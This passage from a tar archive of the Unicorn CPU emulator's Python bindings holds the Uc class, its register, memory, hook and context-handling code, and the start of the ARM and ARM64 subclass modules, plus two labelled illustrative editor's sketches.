    if arch == uc.UC_ARCH_ARM:
        if reg_id == arm64_const.UC_ARM64_REG_CP_REG:
            reg = uc_arm64_cp_reg()
            if not isinstance(value, tuple) or len(value) != 6:
                raise UcError(uc.UC_ERR_ARG)
            reg.crn, reg.crm, reg.op0, reg.op1, reg.op2, reg.val = value
        elif reg_id == arm_const.UC_ARM_REG_CP_REG:
            reg = uc_arm_cp_reg()
            if not isinstance(value, tuple) or len(value) != 8:
                raise UcError(uc.UC_ERR_ARG)
            reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2, reg.val = value

    if reg is None:
        # convert to 64bit number to be safe
        reg = ctypes.c_uint64(value)

    status = reg_write_func(reg_id, ctypes.byref(reg))
    if status != uc.UC_ERR_OK:
        raise UcError(status)

    return


def _catch_hook_exception(func):
    @wraps(func)
    def wrapper(self, *args, **kwargs):
        """Catches exceptions raised in hook functions.

        If an exception is raised, it is saved to the Uc object and a call to
        stop emulation is issued.
        """
        try:
            return func(self, *args, **kwargs)
        except Exception as e:
            # If multiple hooks raise exceptions, just use the first one
            if self._hook_exception is None:
                self._hook_exception = e

            self.emu_stop()

    return wrapper


class uc_arm_cp_reg(ctypes.Structure):
    """ARM coprocessors registers for instructions MRC, MCR, MRRC, MCRR"""
    _fields_ = [
        ("cp", ctypes.c_uint32),
        ("is64", ctypes.c_uint32),
        ("sec", ctypes.c_uint32),
        ("crn", ctypes.c_uint32),
        ("crm", ctypes.c_uint32),
        ("opc1", ctypes.c_uint32),
        ("opc2", ctypes.c_uint32),
        ("val", ctypes.c_uint64)
    ]


class uc_arm64_cp_reg(ctypes.Structure):
    """ARM64 coprocessors registers for instructions MRS, MSR"""
    _fields_ = [
        ("crn", ctypes.c_uint32),
        ("crm", ctypes.c_uint32),
        ("op0", ctypes.c_uint32),
        ("op1", ctypes.c_uint32),
        ("op2", ctypes.c_uint32),
        ("val", ctypes.c_uint64)
    ]


class uc_x86_mmr(ctypes.Structure):
    """Memory-Management Register for instructions IDTR, GDTR, LDTR, TR."""
    _fields_ = [
        ("selector", ctypes.c_uint16),  # not used by GDTR and IDTR
        ("base", ctypes.c_uint64),      # handle 32 or 64 bit CPUs
        ("limit", ctypes.c_uint32),
        ("flags", ctypes.c_uint32),     # not used by GDTR and IDTR
    ]


class uc_x86_msr(ctypes.Structure):
    _fields_ = [
        ("rid", ctypes.c_uint32),
        ("value", ctypes.c_uint64),
    ]


class uc_x86_float80(ctypes.Structure):
    """Float80"""
    _fields_ = [
        ("mantissa", ctypes.c_uint64),
        ("exponent", ctypes.c_uint16),
    ]


class uc_x86_xmm(ctypes.Structure):
    """128-bit xmm register"""
    _fields_ = [
        ("low_qword", ctypes.c_uint64),
        ("high_qword", ctypes.c_uint64),
    ]


class uc_x86_ymm(ctypes.Structure):
    """256-bit ymm register"""
    _fields_ = [
        ("first_qword", ctypes.c_uint64),
        ("second_qword", ctypes.c_uint64),
        ("third_qword", ctypes.c_uint64),
        ("fourth_qword", ctypes.c_uint64),
    ]


class uc_arm64_neon128(ctypes.Structure):
    """128-bit neon register"""
    _fields_ = [
        ("low_qword", ctypes.c_uint64),
        ("high_qword", ctypes.c_uint64),
    ]


# Subclassing ref to allow property assignment.
class UcRef(weakref.ref):
    pass
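
# Editor's note: an illustrative sketch, not part of the original file, of the
# qword packing used by reg_read/reg_write above: a 256-bit YMM value travels
# through the Python API as one big integer and is split into the four 64-bit
# fields of uc_x86_ymm in little-endian qword order.

def _ymm_packing_sketch():
    value = (0x3333333333333333 << 192) | (0x2222222222222222 << 128) | \
            (0x1111111111111111 << 64) | 0xf0

    reg = uc_x86_ymm()
    reg.first_qword = value & 0xffffffffffffffff
    reg.second_qword = (value >> 64) & 0xffffffffffffffff
    reg.third_qword = (value >> 128) & 0xffffffffffffffff
    reg.fourth_qword = value >> 192

    assert reg.first_qword == 0xf0                     # least significant qword
    assert reg.fourth_qword == 0x3333333333333333      # most significant qword
    # reassembling the qwords yields the original integer
    assert value == (reg.first_qword | (reg.second_qword << 64) |
                     (reg.third_qword << 128) | (reg.fourth_qword << 192))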
# This class tracks Uc instance destruction and releases handles.
class UcCleanupManager(object):
    def __init__(self):
        self._refs = {}

    def register(self, uc):
        ref = UcRef(uc, self._finalizer)
        ref._uch = uc._uch
        ref._class = uc.__class__
        self._refs[id(ref)] = ref

    def _finalizer(self, ref):
        # note: this method must be completely self-contained and cannot have any references
        # to anything else in this module.
        #
        # This is because it may be called late in the Python interpreter's shutdown phase, at
        # which point the module's variables may already have been deinitialized and set to None.
        #
        # Not respecting that can lead to errors such as:
        #     Exception AttributeError:
        #         "'NoneType' object has no attribute 'release_handle'"
        #     in <bound method UcCleanupManager._finalizer of
        #         <unicorn.unicorn.UcCleanupManager object at 0x7f0bb83e4310>> ignored
        #
        # For that reason, we do not try to access the `Uc` class directly here but instead use
        # the saved `._class` reference.
        del self._refs[id(ref)]
        ref._class.release_handle(ref._uch)


class Uc(object):
    _cleanup = UcCleanupManager()

    def __init__(self, arch, mode):
        # verify version compatibility with the core before doing anything
        (major, minor, _combined) = uc_version()
        # print("core version =", uc_version())
        # print("binding version =", uc.UC_API_MAJOR, uc.UC_API_MINOR)
        if major != uc.UC_API_MAJOR or minor != uc.UC_API_MINOR:
            self._uch = None
            # our binding version is different from the core's API version
            raise UcError(uc.UC_ERR_VERSION)

        self._arch, self._mode = arch, mode
        self._uch = ctypes.c_void_p()
        status = _uc.uc_open(arch, mode, ctypes.byref(self._uch))
        if status != uc.UC_ERR_OK:
            self._uch = None
            raise UcError(status)
        # internal mapping table to save callback & userdata
        self._callbacks = {}
        self._ctype_cbs = []
        self._callback_count = 0
        self._cleanup.register(self)
        self._hook_exception = None  # The exception raised in a hook

    @staticmethod
    def release_handle(uch):
        if uch:
            try:
                status = _uc.uc_close(uch)
                if status != uc.UC_ERR_OK:
                    raise UcError(status)
            except:
                # _uc might be pulled from under our feet
                pass

    # emulate from @begin, and stop when reaching address @until
    def emu_start(self, begin, until, timeout=0, count=0):
        self._hook_exception = None
        status = _uc.uc_emu_start(self._uch, begin, until, timeout, count)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

        if self._hook_exception is not None:
            raise self._hook_exception

    # stop emulation
    def emu_stop(self):
        status = _uc.uc_emu_stop(self._uch)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    # return the value of a register
    def reg_read(self, reg_id, opt=None):
        return reg_read(functools.partial(_uc.uc_reg_read, self._uch), self._arch, reg_id, opt)

    # write to a register
    def reg_write(self, reg_id, value):
        return reg_write(functools.partial(_uc.uc_reg_write, self._uch), self._arch, reg_id, value)

    # read from MSR - X86 only
    def msr_read(self, msr_id):
        return self.reg_read(x86_const.UC_X86_REG_MSR, msr_id)

    # write to MSR - X86 only
    def msr_write(self, msr_id, value):
        return self.reg_write(x86_const.UC_X86_REG_MSR, (msr_id, value))

    # read data from memory
    def mem_read(self, address, size):
        data = ctypes.create_string_buffer(size)
        status = _uc.uc_mem_read(self._uch, address, data, size)
        if status != uc.UC_ERR_OK:
            raise UcError(status)
        return bytearray(data)

    # write to memory
    def mem_write(self, address, data):
        status = _uc.uc_mem_write(self._uch, address, data, len(data))
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    def _mmio_map_read_cb(self, handle, offset, size, user_data):
        (cb, data) = self._callbacks[user_data]
        return cb(self, offset, size, data)
    def _mmio_map_write_cb(self, handle, offset, size, value, user_data):
        (cb, data) = self._callbacks[user_data]
        cb(self, offset, size, value, data)

    def mmio_map(self, address, size, read_cb, user_data_read, write_cb, user_data_write):
        internal_read_cb = ctypes.cast(UC_MMIO_READ_CB(self._mmio_map_read_cb), UC_MMIO_READ_CB)
        internal_write_cb = ctypes.cast(UC_MMIO_WRITE_CB(self._mmio_map_write_cb), UC_MMIO_WRITE_CB)

        self._callback_count += 1
        self._callbacks[self._callback_count] = (read_cb, user_data_read)
        read_count = self._callback_count
        self._callback_count += 1
        self._callbacks[self._callback_count] = (write_cb, user_data_write)
        write_count = self._callback_count

        status = _uc.uc_mmio_map(self._uch, address, size, internal_read_cb, read_count, internal_write_cb, write_count)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

        # https://docs.python.org/3/library/ctypes.html#callback-functions
        self._ctype_cbs.append(internal_read_cb)
        self._ctype_cbs.append(internal_write_cb)

    # map a range of memory
    def mem_map(self, address, size, perms=uc.UC_PROT_ALL):
        status = _uc.uc_mem_map(self._uch, address, size, perms)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    # map a range of memory from a raw host memory address
    def mem_map_ptr(self, address, size, perms, ptr):
        status = _uc.uc_mem_map_ptr(self._uch, address, size, perms, ptr)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    # unmap a range of memory
    def mem_unmap(self, address, size):
        status = _uc.uc_mem_unmap(self._uch, address, size)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    # protect a range of memory
    def mem_protect(self, address, size, perms=uc.UC_PROT_ALL):
        status = _uc.uc_mem_protect(self._uch, address, size, perms)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    # return CPU mode at runtime
    def query(self, query_mode):
        result = ctypes.c_size_t(0)
        status = _uc.uc_query(self._uch, query_mode, ctypes.byref(result))
        if status != uc.UC_ERR_OK:
            raise UcError(status)
        return result.value

    @_catch_hook_exception
    def _hook_tcg_op_cb(self, handle, address, arg1, arg2, user_data):
        (cb, data) = self._callbacks[user_data]
        cb(self, address, arg1, arg2, user_data)

    @_catch_hook_exception
    def _hook_edge_gen_cb(self, handle, cur, prev, user_data):
        (cb, data) = self._callbacks[user_data]
        cb(self, cur.contents, prev.contents, user_data)

    @_catch_hook_exception
    def _hookcode_cb(self, handle, address, size, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        cb(self, address, size, data)

    @_catch_hook_exception
    def _hook_mem_invalid_cb(self, handle, access, address, size, value, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        return cb(self, access, address, size, value, data)

    @_catch_hook_exception
    def _hook_mem_access_cb(self, handle, access, address, size, value, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        cb(self, access, address, size, value, data)

    @_catch_hook_exception
    def _hook_intr_cb(self, handle, intno, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        cb(self, intno, data)

    @_catch_hook_exception
    def _hook_insn_invalid_cb(self, handle, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        return cb(self, data)

    @_catch_hook_exception
    def _hook_insn_in_cb(self, handle, port, size, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        return cb(self, port, size, data)
    @_catch_hook_exception
    def _hook_insn_sys_cb(self, handle, reg, pcp_reg, user_data):
        cp_reg = ctypes.cast(pcp_reg, ctypes.POINTER(uc_arm64_cp_reg)).contents

        uc_arm64_cp_reg_tuple = namedtuple("uc_arm64_cp_reg_tuple", ["crn", "crm", "op0", "op1", "op2", "val"])

        (cb, data) = self._callbacks[user_data]

        return cb(self, reg, uc_arm64_cp_reg_tuple(cp_reg.crn, cp_reg.crm, cp_reg.op0, cp_reg.op1, cp_reg.op2, cp_reg.val), data)

    @_catch_hook_exception
    def _hook_insn_out_cb(self, handle, port, size, value, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        cb(self, port, size, value, data)

    @_catch_hook_exception
    def _hook_insn_syscall_cb(self, handle, user_data):
        # call user's callback with self object
        (cb, data) = self._callbacks[user_data]
        cb(self, data)

    def ctl(self, control, *args):
        status = _uc.uc_ctl(self._uch, control, *args)
        if status != uc.UC_ERR_OK:
            raise UcError(status)
        return status

    def __ctl(self, ctl, nr, rw):
        return ctl | (nr << 26) | (rw << 30)

    def __ctl_r(self, ctl, nr):
        return self.__ctl(ctl, nr, uc.UC_CTL_IO_READ)

    def __ctl_w(self, ctl, nr):
        return self.__ctl(ctl, nr, uc.UC_CTL_IO_WRITE)

    def __ctl_rw(self, ctl, nr):
        return self.__ctl(ctl, nr, uc.UC_CTL_IO_READ_WRITE)

    def __ctl_r_1_arg(self, ctl, ctp):
        arg = ctp()
        self.ctl(self.__ctl_r(ctl, 1), ctypes.byref(arg))
        return arg.value

    def __ctl_w_1_arg(self, ctl, val, ctp):
        arg = ctp(val)
        self.ctl(self.__ctl_w(ctl, 1), arg)

    def __ctl_w_2_arg(self, ctl, val1, val2, ctp1, ctp2):
        arg1 = ctp1(val1)
        arg2 = ctp2(val2)
        self.ctl(self.__ctl_w(ctl, 2), arg1, arg2)

    def __ctl_rw_1_1_arg(self, ctl, val, ctp1, ctp2):
        arg1 = ctp1(val)
        arg2 = ctp2()
        self.ctl(self.__ctl_rw(ctl, 2), arg1, ctypes.byref(arg2))
        return arg2

    def ctl_get_mode(self):
        return self.__ctl_r_1_arg(uc.UC_CTL_UC_MODE, ctypes.c_int)

    def ctl_get_page_size(self):
        return self.__ctl_r_1_arg(uc.UC_CTL_UC_PAGE_SIZE, ctypes.c_uint32)

    def ctl_set_page_size(self, val):
        self.__ctl_w_1_arg(uc.UC_CTL_UC_PAGE_SIZE, val, ctypes.c_uint32)

    def ctl_get_arch(self):
        return self.__ctl_r_1_arg(uc.UC_CTL_UC_ARCH, ctypes.c_int)

    def ctl_get_timeout(self):
        return self.__ctl_r_1_arg(uc.UC_CTL_UC_TIMEOUT, ctypes.c_uint64)

    def ctl_exits_enabled(self, val):
        self.__ctl_w_1_arg(uc.UC_CTL_UC_USE_EXITS, val, ctypes.c_int)

    def ctl_get_exits_cnt(self):
        return self.__ctl_r_1_arg(uc.UC_CTL_UC_EXITS_CNT, ctypes.c_size_t)

    def ctl_get_exits(self):
        l = self.ctl_get_exits_cnt()
        arr = (ctypes.c_uint64 * l)()
        self.ctl(self.__ctl_r(uc.UC_CTL_UC_EXITS, 2), ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(l))
        return [i for i in arr]

    def ctl_set_exits(self, exits):
        arr = (ctypes.c_uint64 * len(exits))()
        for idx, exit in enumerate(exits):
            arr[idx] = exit
        self.ctl(self.__ctl_w(uc.UC_CTL_UC_EXITS, 2), ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(len(exits)))

    def ctl_get_cpu_model(self):
        return self.__ctl_r_1_arg(uc.UC_CTL_CPU_MODEL, ctypes.c_int)

    def ctl_set_cpu_model(self, val):
        self.__ctl_w_1_arg(uc.UC_CTL_CPU_MODEL, val, ctypes.c_int)

    def ctl_remove_cache(self, addr, end):
        self.__ctl_w_2_arg(uc.UC_CTL_TB_REMOVE_CACHE, addr, end, ctypes.c_uint64, ctypes.c_uint64)

    def ctl_request_cache(self, addr):
        return self.__ctl_rw_1_1_arg(uc.UC_CTL_TB_REQUEST_CACHE, addr, ctypes.c_uint64, uc_tb)

    # add a hook
    def hook_add(self, htype, callback, user_data=None, begin=1, end=0, arg1=0, arg2=0):
        _h2 = uc_hook_h()

        # save callback & user_data
        self._callback_count += 1
        self._callbacks[self._callback_count] = (callback, user_data)

        cb = None

        if htype == uc.UC_HOOK_INSN:
            insn = ctypes.c_int(arg1)
            if arg1 == x86_const.UC_X86_INS_IN:  # IN instruction
                cb = ctypes.cast(UC_HOOK_INSN_IN_CB(self._hook_insn_in_cb), UC_HOOK_INSN_IN_CB)
            if arg1 == x86_const.UC_X86_INS_OUT:  # OUT instruction
                cb = ctypes.cast(UC_HOOK_INSN_OUT_CB(self._hook_insn_out_cb), UC_HOOK_INSN_OUT_CB)
            if arg1 in (x86_const.UC_X86_INS_SYSCALL, x86_const.UC_X86_INS_SYSENTER):  # SYSCALL/SYSENTER instruction
                cb = ctypes.cast(UC_HOOK_INSN_SYSCALL_CB(self._hook_insn_syscall_cb), UC_HOOK_INSN_SYSCALL_CB)
            if arg1 in (arm64_const.UC_ARM64_INS_MRS, arm64_const.UC_ARM64_INS_MSR, arm64_const.UC_ARM64_INS_SYS, arm64_const.UC_ARM64_INS_SYSL):
                cb = ctypes.cast(UC_HOOK_INSN_SYS_CB(self._hook_insn_sys_cb), UC_HOOK_INSN_SYS_CB)
            status = _uc.uc_hook_add(
                self._uch, ctypes.byref(_h2), htype, cb,
                ctypes.cast(self._callback_count, ctypes.c_void_p),
                ctypes.c_uint64(begin), ctypes.c_uint64(end), insn
            )
        elif htype == uc.UC_HOOK_TCG_OPCODE:
            opcode = ctypes.c_int(arg1)
            flags = ctypes.c_int(arg2)

            status = _uc.uc_hook_add(
                self._uch, ctypes.byref(_h2), htype,
                ctypes.cast(UC_HOOK_TCG_OPCODE_CB(self._hook_tcg_op_cb), UC_HOOK_TCG_OPCODE_CB),
                ctypes.cast(self._callback_count, ctypes.c_void_p),
                ctypes.c_uint64(begin), ctypes.c_uint64(end), opcode, flags
            )
        elif htype == uc.UC_HOOK_INTR:
            cb = ctypes.cast(UC_HOOK_INTR_CB(self._hook_intr_cb), UC_HOOK_INTR_CB)
            status = _uc.uc_hook_add(
                self._uch, ctypes.byref(_h2), htype, cb,
                ctypes.cast(self._callback_count, ctypes.c_void_p),
                ctypes.c_uint64(begin), ctypes.c_uint64(end)
            )
        elif htype == uc.UC_HOOK_INSN_INVALID:
            cb = ctypes.cast(UC_HOOK_INSN_INVALID_CB(self._hook_insn_invalid_cb), UC_HOOK_INSN_INVALID_CB)
            status = _uc.uc_hook_add(
                self._uch, ctypes.byref(_h2), htype, cb,
                ctypes.cast(self._callback_count, ctypes.c_void_p),
                ctypes.c_uint64(begin), ctypes.c_uint64(end)
            )
        elif htype == uc.UC_HOOK_EDGE_GENERATED:
            cb = ctypes.cast(UC_HOOK_EDGE_GEN_CB(self._hook_edge_gen_cb), UC_HOOK_EDGE_GEN_CB)
            status = _uc.uc_hook_add(
                self._uch, ctypes.byref(_h2), htype, cb,
                ctypes.cast(self._callback_count, ctypes.c_void_p),
                ctypes.c_uint64(begin), ctypes.c_uint64(end)
            )
        else:
            if htype in (uc.UC_HOOK_BLOCK, uc.UC_HOOK_CODE):
                # set callback with wrapper, so it can be called
                # with this object as param
                cb = ctypes.cast(UC_HOOK_CODE_CB(self._hookcode_cb), UC_HOOK_CODE_CB)
                status = _uc.uc_hook_add(
                    self._uch, ctypes.byref(_h2), htype, cb,
                    ctypes.cast(self._callback_count, ctypes.c_void_p),
                    ctypes.c_uint64(begin), ctypes.c_uint64(end)
                )
            elif htype & (uc.UC_HOOK_MEM_READ_UNMAPPED |
                          uc.UC_HOOK_MEM_WRITE_UNMAPPED |
                          uc.UC_HOOK_MEM_FETCH_UNMAPPED |
                          uc.UC_HOOK_MEM_READ_PROT |
                          uc.UC_HOOK_MEM_WRITE_PROT |
                          uc.UC_HOOK_MEM_FETCH_PROT):
                cb = ctypes.cast(UC_HOOK_MEM_INVALID_CB(self._hook_mem_invalid_cb), UC_HOOK_MEM_INVALID_CB)
                status = _uc.uc_hook_add(
                    self._uch, ctypes.byref(_h2), htype, cb,
                    ctypes.cast(self._callback_count, ctypes.c_void_p),
                    ctypes.c_uint64(begin), ctypes.c_uint64(end)
                )
            else:
                cb = ctypes.cast(UC_HOOK_MEM_ACCESS_CB(self._hook_mem_access_cb), UC_HOOK_MEM_ACCESS_CB)
                status = _uc.uc_hook_add(
                    self._uch, ctypes.byref(_h2), htype, cb,
                    ctypes.cast(self._callback_count, ctypes.c_void_p),
                    ctypes.c_uint64(begin), ctypes.c_uint64(end)
                )
        # save the ctype function so gc will leave it alone.
        self._ctype_cbs.append(cb)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        return _h2.value

    # delete a hook
    def hook_del(self, h):
        _h = uc_hook_h(h)

        status = _uc.uc_hook_del(self._uch, _h)
        if status != uc.UC_ERR_OK:
            raise UcError(status)
        h = 0

    def context_save(self):
        context = UcContext(self._uch, self._arch, self._mode)

        status = _uc.uc_context_save(self._uch, context.context)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

        return context

    def context_update(self, context):
        status = _uc.uc_context_save(self._uch, context.context)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    def context_restore(self, context):
        status = _uc.uc_context_restore(self._uch, context.context)
        if status != uc.UC_ERR_OK:
            raise UcError(status)

    # this returns a generator of regions in the form (begin, end, perms)
    def mem_regions(self):
        regions = ctypes.POINTER(_uc_mem_region)()
        count = ctypes.c_uint32()

        status = _uc.uc_mem_regions(self._uch, ctypes.byref(regions), ctypes.byref(count))
        if status != uc.UC_ERR_OK:
            raise UcError(status)

        try:
            for i in range(count.value):
                yield (regions[i].begin, regions[i].end, regions[i].perms)
        finally:
            _uc.uc_free(regions)


class UcContext:
    def __init__(self, h, arch, mode):
        self._context = uc_context()
        self._size = _uc.uc_context_size(h)
        self._to_free = True
        status = _uc.uc_context_alloc(h, ctypes.byref(self._context))
        if status != uc.UC_ERR_OK:
            raise UcError(status)
        self._arch = arch
        self._mode = mode

    @property
    def context(self):
        return self._context

    @property
    def size(self):
        return self._size

    @property
    def arch(self):
        return self._arch

    @property
    def mode(self):
        return self._mode

    # return the value of a register
    def reg_read(self, reg_id, opt=None):
        return reg_read(functools.partial(_uc.uc_context_reg_read, self._context), self.arch, reg_id, opt)

    # write to a register
    def reg_write(self, reg_id, value):
        return reg_write(functools.partial(_uc.uc_context_reg_write, self._context), self.arch, reg_id, value)

    # Make UcContext picklable
    def __getstate__(self):
        return (bytes(self), self.size, self.arch, self.mode)

    def __setstate__(self, state):
        self._size = state[1]
        self._context = ctypes.cast(ctypes.create_string_buffer(state[0], self._size), uc_context)
        # __init__ won't be invoked, so we are safe to set it here.
        self._to_free = False
        self._arch = state[2]
        self._mode = state[3]

    def __bytes__(self):
        return ctypes.string_at(self.context, self.size)

    def __del__(self):
        # We need this property since we shouldn't free it if the object is
        # constructed from pickled bytes.
        if self._to_free:
            _uc.uc_context_free(self._context)


# print out debugging info
def debug():
    archs = {
        "arm": uc.UC_ARCH_ARM,
        "arm64": uc.UC_ARCH_ARM64,
        "mips": uc.UC_ARCH_MIPS,
        "sparc": uc.UC_ARCH_SPARC,
        "m68k": uc.UC_ARCH_M68K,
        "x86": uc.UC_ARCH_X86,
        "riscv": uc.UC_ARCH_RISCV,
        "ppc": uc.UC_ARCH_PPC,
    }

    all_archs = ""
    keys = archs.keys()
    for k in sorted(keys):
        if uc_arch_supported(archs[k]):
            all_archs += "-%s" % k

    major, minor, _combined = uc_version()

    return "python-%s-c%u.%u-b%u.%u" % (
        all_archs, major, minor, uc.UC_API_MAJOR, uc.UC_API_MINOR
    )
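
# Editor's note: a minimal illustrative sketch, not part of the original file,
# of the UcContext pickling support implemented above; the arch, mode and the
# register value used are arbitrary assumptions for demonstration purposes.

def _context_pickle_sketch():
    import pickle

    mu = Uc(uc.UC_ARCH_X86, uc.UC_MODE_32)
    mu.reg_write(x86_const.UC_X86_REG_EAX, 0x1234)

    saved = mu.context_save()      # snapshot CPU state
    blob = pickle.dumps(saved)     # __getstate__ -> (bytes, size, arch, mode)

    restored = pickle.loads(blob)  # __setstate__ rebuilds from the raw bytes
    mu.context_restore(restored)   # push the snapshot back into the engine
    assert mu.reg_read(x86_const.UC_X86_REG_EAX) == 0x1234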
unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/__init__.py

from .unicorn import *

unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/__init__.py

unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/arm.py

"""AArch32 classes and structures.
"""
# @author elicn

from typing import Any, Tuple

import ctypes

# traditional unicorn imports
from unicorn import arm_const as const

# newly introduced unicorn imports
from ..unicorn import Uc
from .types import UcTupledReg, UcReg128

ARMCPReg = Tuple[int, int, int, int, int, int, int, int]


class UcRegCP(UcTupledReg[ARMCPReg]):
    """ARM coprocessors registers for instructions MRC, MCR, MRRC, MCRR
    """

    _fields_ = (
        ('cp', ctypes.c_uint32),
        ('is64', ctypes.c_uint32),
        ('sec', ctypes.c_uint32),
        ('crn', ctypes.c_uint32),
        ('crm', ctypes.c_uint32),
        ('opc1', ctypes.c_uint32),
        ('opc2', ctypes.c_uint32),
        ('val', ctypes.c_uint64)
    )

    @property
    def value(self) -> int:
        return self.val


class UcAArch32(Uc):
    """Unicorn subclass for ARM architecture.
    """

    REG_RANGE_Q = range(const.UC_ARM_REG_Q0, const.UC_ARM_REG_Q15 + 1)

    @staticmethod
    def __select_reg_class(reg_id: int):
        """Select class for special architectural registers.
""" reg_class = ( (UcAArch32.REG_RANGE_Q, UcReg128), ) return next((cls for rng, cls in reg_class if reg_id in rng), None) def reg_read(self, reg_id: int, aux: Any = None): # select register class for special cases reg_cls = UcAArch32.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM_REG_CP_REG: return self._reg_read(reg_id, UcRegCP, *aux) else: # fallback to default reading method return super().reg_read(reg_id, aux) return self._reg_read(reg_id, reg_cls) def reg_write(self, reg_id: int, value) -> None: # select register class for special cases reg_cls = UcAArch32.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM_REG_CP_REG: self._reg_write(reg_id, UcRegCP, value) else: # fallback to default writing method super().reg_write(reg_id, value) else: self._reg_write(reg_id, reg_cls, value) __all__ = ['UcRegCP', 'UcAArch32'] ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/arm64.py�������������������������������������0000664�0000000�0000000�00000007607�14675241067�0024501�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""AArch64 classes and structures. """ # @author elicn from typing import Any, Callable, NamedTuple, Tuple import ctypes # traditional unicorn imports from unicorn import arm64_const as const from unicorn.unicorn_const import UC_ERR_ARG, UC_HOOK_INSN # newly introduced unicorn imports from ..unicorn import Uc, UcError, uccallback from .types import uc_engine, UcTupledReg, UcReg128 ARM64CPReg = Tuple[int, int, int, int, int, int] HOOK_INSN_SYS_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_void_p) class UcRegCP64(UcTupledReg[ARM64CPReg]): """ARM64 coprocessors registers for instructions MRS, MSR """ _fields_ = ( ('crn', ctypes.c_uint32), ('crm', ctypes.c_uint32), ('op0', ctypes.c_uint32), ('op1', ctypes.c_uint32), ('op2', ctypes.c_uint32), ('val', ctypes.c_uint64) ) @property def value(self) -> int: return self.val class UcAArch64(Uc): """Unicorn subclass for ARM64 architecture. 
""" REG_RANGE_Q = range(const.UC_ARM64_REG_Q0, const.UC_ARM64_REG_Q31 + 1) REG_RANGE_V = range(const.UC_ARM64_REG_V0, const.UC_ARM64_REG_V31 + 1) def hook_add(self, htype: int, callback: Callable, user_data: Any = None, begin: int = 1, end: int = 0, aux1: int = 0, aux2: int = 0) -> int: if htype != UC_HOOK_INSN: return super().hook_add(htype, callback, user_data, begin, end, aux1, aux2) insn = ctypes.c_int(aux1) def __hook_insn_sys(): @uccallback(self, HOOK_INSN_SYS_CFUNC) def __hook_insn_sys_cb(uc: Uc, reg: int, pcp_reg: Any, key: int) -> int: cp_reg = ctypes.cast(pcp_reg, ctypes.POINTER(UcRegCP64)).contents class CpReg(NamedTuple): crn: int crm: int op0: int op1: int op2: int val: int cp_reg = CpReg(cp_reg.crn, cp_reg.crm, cp_reg.op0, cp_reg.op1, cp_reg.op2, cp_reg.val) return callback(uc, reg, cp_reg, user_data) return __hook_insn_sys_cb handlers = { const.UC_ARM64_INS_MRS : __hook_insn_sys, const.UC_ARM64_INS_MSR : __hook_insn_sys, const.UC_ARM64_INS_SYS : __hook_insn_sys, const.UC_ARM64_INS_SYSL : __hook_insn_sys } handler = handlers.get(insn.value) if handler is None: raise UcError(UC_ERR_ARG) fptr = handler() return getattr(self, '_Uc__do_hook_add')(htype, fptr, begin, end, insn) @staticmethod def __select_reg_class(reg_id: int): """Select class for special architectural registers. """ reg_class = ( (UcAArch64.REG_RANGE_Q, UcReg128), (UcAArch64.REG_RANGE_V, UcReg128) ) return next((cls for rng, cls in reg_class if reg_id in rng), None) def reg_read(self, reg_id: int, aux: Any = None): # select register class for special cases reg_cls = UcAArch64.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM64_REG_CP_REG: return self._reg_read(reg_id, UcRegCP64, *aux) else: # fallback to default reading method return super().reg_read(reg_id, aux) return self._reg_read(reg_id, reg_cls) def reg_write(self, reg_id: int, value) -> None: # select register class for special cases reg_cls = UcAArch64.__select_reg_class(reg_id) if reg_cls is None: if reg_id == const.UC_ARM64_REG_CP_REG: self._reg_write(reg_id, UcRegCP64, value) else: # fallback to default writing method super().reg_write(reg_id, value) else: self._reg_write(reg_id, reg_cls, value) __all__ = ['UcRegCP64', 'UcAArch64'] �������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/intel.py�������������������������������������0000664�0000000�0000000�00000014233�14675241067�0024654�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""Intel architecture classes and structures. 
